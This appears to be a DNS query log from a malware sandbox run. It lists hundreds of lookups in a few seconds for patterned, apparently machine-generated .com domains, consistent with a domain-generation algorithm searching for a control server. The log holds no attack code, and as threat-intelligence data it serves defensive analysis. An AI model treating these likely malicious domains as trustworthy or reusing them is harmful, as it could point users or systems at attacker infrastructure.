                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854079962 CET192.168.2.81.1.1.10x9c0Standard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854298115 CET192.168.2.81.1.1.10x3759Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854548931 CET192.168.2.81.1.1.10x462aStandard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854732990 CET192.168.2.81.1.1.10x1a2dStandard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854882956 CET192.168.2.81.1.1.10x5495Standard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855030060 CET192.168.2.81.1.1.10x75e0Standard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855202913 CET192.168.2.81.1.1.10x4cf4Standard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855571985 CET192.168.2.81.1.1.10x3471Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.856885910 CET192.168.2.81.1.1.10x29bStandard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.898762941 CET192.168.2.81.1.1.10xacf1Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.898947001 CET192.168.2.81.1.1.10xb3aaStandard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.903695107 CET192.168.2.81.1.1.10xb58cStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.903711081 CET192.168.2.81.1.1.10xfb31Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.904151917 CET192.168.2.81.1.1.10xe8d0Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.907557964 CET192.168.2.81.1.1.10xfd3Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.908613920 CET192.168.2.81.1.1.10x7f4cStandard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.909025908 CET192.168.2.81.1.1.10x415Standard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.909292936 CET192.168.2.81.1.1.10xe0a7Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.909851074 CET192.168.2.81.1.1.10x8d9bStandard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.910300016 CET192.168.2.81.1.1.10xd2f6Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.910630941 CET192.168.2.81.1.1.10xae70Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.911268950 CET192.168.2.81.1.1.10x5f39Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.911839962 CET192.168.2.81.1.1.10xdd8cStandard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.912384987 CET192.168.2.81.1.1.10x13cbStandard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.913115025 CET192.168.2.81.1.1.10xfdb2Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.917375088 CET192.168.2.81.1.1.10xfed2Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.927534103 CET192.168.2.81.1.1.10x26aeStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.935492039 CET192.168.2.81.1.1.10xf6d3Standard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.942827940 CET192.168.2.81.1.1.10x84d4Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.943706036 CET192.168.2.81.1.1.10x8662Standard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.943881035 CET192.168.2.81.1.1.10xf7bbStandard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.945857048 CET192.168.2.81.1.1.10x808eStandard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.946029902 CET192.168.2.81.1.1.10x47bbStandard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.952790976 CET192.168.2.81.1.1.10x1a83Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.953022957 CET192.168.2.81.1.1.10xda03Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.953119040 CET192.168.2.81.1.1.10x3d27Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.953460932 CET192.168.2.81.1.1.10xedb0Standard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.954530001 CET192.168.2.81.1.1.10x2b8bStandard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.955014944 CET192.168.2.81.1.1.10xa584Standard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.955647945 CET192.168.2.81.1.1.10x9d3dStandard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.956021070 CET192.168.2.81.1.1.10x334Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.971065998 CET192.168.2.81.1.1.10xc026Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.986388922 CET192.168.2.81.1.1.10x5f37Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.123574972 CET192.168.2.81.1.1.10xe9bdStandard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.430560112 CET192.168.2.81.1.1.10x7ddStandard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.432636023 CET192.168.2.81.1.1.10xe45aStandard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.457586050 CET192.168.2.81.1.1.10xb835Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.457703114 CET192.168.2.81.1.1.10xf63fStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.460745096 CET192.168.2.81.1.1.10x4d76Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.463886023 CET192.168.2.81.1.1.10xa16dStandard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.496159077 CET192.168.2.81.1.1.10xd1aaStandard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.496881008 CET192.168.2.81.1.1.10x2cc9Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.506589890 CET192.168.2.81.1.1.10x53afStandard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.513143063 CET192.168.2.81.1.1.10xb6ddStandard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.516593933 CET192.168.2.81.1.1.10xe2d9Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.517364979 CET192.168.2.81.1.1.10xd2adStandard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.517791986 CET192.168.2.81.1.1.10x8b18Standard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.521095991 CET192.168.2.81.1.1.10xe000Standard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.521954060 CET192.168.2.81.1.1.10xa403Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.522880077 CET192.168.2.81.1.1.10xe7d4Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.531002045 CET192.168.2.81.1.1.10xc3a4Standard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.533480883 CET192.168.2.81.1.1.10x370fStandard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.545969009 CET192.168.2.81.1.1.10xa8c0Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.573056936 CET192.168.2.81.1.1.10x8120Standard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.574315071 CET192.168.2.81.1.1.10xadc6Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.574594021 CET192.168.2.81.1.1.10x11d6Standard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.574764967 CET192.168.2.81.1.1.10xf242Standard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.574949980 CET192.168.2.81.1.1.10x6694Standard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575099945 CET192.168.2.81.1.1.10x7201Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575238943 CET192.168.2.81.1.1.10xea97Standard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575377941 CET192.168.2.81.1.1.10x1f61Standard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575509071 CET192.168.2.81.1.1.10xb8f3Standard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575659037 CET192.168.2.81.1.1.10x2192Standard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575802088 CET192.168.2.81.1.1.10x6971Standard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575938940 CET192.168.2.81.1.1.10x22e6Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576082945 CET192.168.2.81.1.1.10xcdc5Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576225042 CET192.168.2.81.1.1.10x7c9cStandard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576364994 CET192.168.2.81.1.1.10xedc3Standard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576500893 CET192.168.2.81.1.1.10x785dStandard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576630116 CET192.168.2.81.1.1.10x93ccStandard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.578979015 CET192.168.2.81.1.1.10xbcd0Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.582233906 CET192.168.2.81.1.1.10xa9dfStandard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.582525969 CET192.168.2.81.1.1.10x5d09Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.610343933 CET192.168.2.81.1.1.10x4346Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.617883921 CET192.168.2.81.1.1.10x9abeStandard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619075060 CET192.168.2.81.1.1.10x8febStandard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619330883 CET192.168.2.81.1.1.10xcfc5Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619528055 CET192.168.2.81.1.1.10x3f03Standard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619632006 CET192.168.2.81.1.1.10x2e7cStandard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619806051 CET192.168.2.81.1.1.10xf004Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619877100 CET192.168.2.81.1.1.10x996bStandard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619992971 CET192.168.2.81.1.1.10xba2cStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.620373011 CET192.168.2.81.1.1.10xe890Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.620579004 CET192.168.2.81.1.1.10x8f23Standard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.621052980 CET192.168.2.81.1.1.10xd07aStandard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.621243954 CET192.168.2.81.1.1.10x44d4Standard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625456095 CET192.168.2.81.1.1.10xa968Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625629902 CET192.168.2.81.1.1.10xcfa6Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625792027 CET192.168.2.81.1.1.10xe296Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625943899 CET192.168.2.81.1.1.10xbf67Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626089096 CET192.168.2.81.1.1.10x71a4Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626228094 CET192.168.2.81.1.1.10x8651Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626358986 CET192.168.2.81.1.1.10x9199Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626620054 CET192.168.2.81.1.1.10x3401Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.627151012 CET192.168.2.81.1.1.10xa173Standard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.627934933 CET192.168.2.81.1.1.10xbStandard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.631983042 CET192.168.2.81.1.1.10x584eStandard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.822108030 CET192.168.2.81.1.1.10x1f20Standard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.960943937 CET192.168.2.81.1.1.10xe494Standard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.962795973 CET192.168.2.81.1.1.10xcefaStandard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.963279963 CET192.168.2.81.1.1.10xef57Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.964711905 CET192.168.2.81.1.1.10x6568Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.966873884 CET192.168.2.81.1.1.10xf628Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.971338034 CET192.168.2.81.1.1.10xc4b7Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.974669933 CET192.168.2.81.1.1.10x3236Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.975748062 CET192.168.2.81.1.1.10x32aeStandard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.988967896 CET192.168.2.81.1.1.10xa026Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.994606018 CET192.168.2.81.1.1.10x3ef7Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.994749069 CET192.168.2.81.1.1.10xe110Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995125055 CET192.168.2.81.1.1.10xda0Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995157003 CET192.168.2.81.1.1.10x2a15Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995582104 CET192.168.2.81.1.1.10xf0f3Standard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.015829086 CET192.168.2.81.1.1.10x4c6cStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.016064882 CET192.168.2.81.1.1.10xc6f9Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.023145914 CET192.168.2.81.1.1.10x5104Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.030179977 CET192.168.2.81.1.1.10xeb8bStandard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.048535109 CET192.168.2.81.1.1.10x39a4Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.048825979 CET192.168.2.81.1.1.10x1dd3Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.049009085 CET192.168.2.81.1.1.10x5f99Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.053539991 CET192.168.2.81.1.1.10x8a2bStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.053903103 CET192.168.2.81.1.1.10x2a88Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.054615021 CET192.168.2.81.1.1.10x5d7Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.056608915 CET192.168.2.81.1.1.10xe371Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.057251930 CET192.168.2.81.1.1.10x8e4dStandard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.059463024 CET192.168.2.81.1.1.10x80eeStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.061425924 CET192.168.2.81.1.1.10x8b29Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.061707020 CET192.168.2.81.1.1.10x4444Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.085669041 CET192.168.2.81.1.1.10xf9aaStandard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086155891 CET192.168.2.81.1.1.10x87d3Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086332083 CET192.168.2.81.1.1.10x66daStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086509943 CET192.168.2.81.1.1.10x363aStandard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.087625980 CET192.168.2.81.1.1.10xa7c5Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.093360901 CET192.168.2.81.1.1.10x6045Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.107997894 CET192.168.2.81.1.1.10x3d37Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.109899044 CET192.168.2.81.1.1.10x7b0Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.120982885 CET192.168.2.81.1.1.10xf3a4Standard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.121155977 CET192.168.2.81.1.1.10x48eeStandard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.121305943 CET192.168.2.81.1.1.10xcc40Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.121462107 CET192.168.2.81.1.1.10x4094Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122155905 CET192.168.2.81.1.1.10xc656Standard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122370005 CET192.168.2.81.1.1.10xeb45Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122549057 CET192.168.2.81.1.1.10x4ca9Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122719049 CET192.168.2.81.1.1.10x8b86Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122870922 CET192.168.2.81.1.1.10xf28cStandard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123016119 CET192.168.2.81.1.1.10x57b6Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123156071 CET192.168.2.81.1.1.10x198dStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123342037 CET192.168.2.81.1.1.10x3afStandard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123609066 CET192.168.2.81.1.1.10xcf4dStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123830080 CET192.168.2.81.1.1.10x90acStandard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123982906 CET192.168.2.81.1.1.10xbdd4Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.132989883 CET192.168.2.81.1.1.10xcff5Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.134162903 CET192.168.2.81.1.1.10xba06Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.134320021 CET192.168.2.81.1.1.10xd522Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.134474993 CET192.168.2.81.1.1.10xfcefStandard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.134610891 CET192.168.2.81.1.1.10xec03Standard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.136657953 CET192.168.2.81.1.1.10x254cStandard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.137723923 CET192.168.2.81.1.1.10x16d1Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.137893915 CET192.168.2.81.1.1.10x3c59Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.140275955 CET192.168.2.81.1.1.10xa99cStandard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.162028074 CET192.168.2.81.1.1.10x502Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.162235975 CET192.168.2.81.1.1.10xef99Standard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.162405968 CET192.168.2.81.1.1.10xb480Standard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.378875017 CET192.168.2.81.1.1.10xc52cStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.379214048 CET192.168.2.81.1.1.10xb069Standard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.379439116 CET192.168.2.81.1.1.10xa3dbStandard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.379851103 CET192.168.2.81.1.1.10xd8fbStandard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.380924940 CET192.168.2.81.1.1.10xd4ffStandard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.381174088 CET192.168.2.81.1.1.10x9762Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.381541014 CET192.168.2.81.1.1.10x4862Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.381661892 CET192.168.2.81.1.1.10x1e07Standard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.382026911 CET192.168.2.81.1.1.10x5891Standard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.382128000 CET192.168.2.81.1.1.10x7ed4Standard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.382487059 CET192.168.2.81.1.1.10xa436Standard query (0)galyzus.comA (IP address)IN (0x0001)false
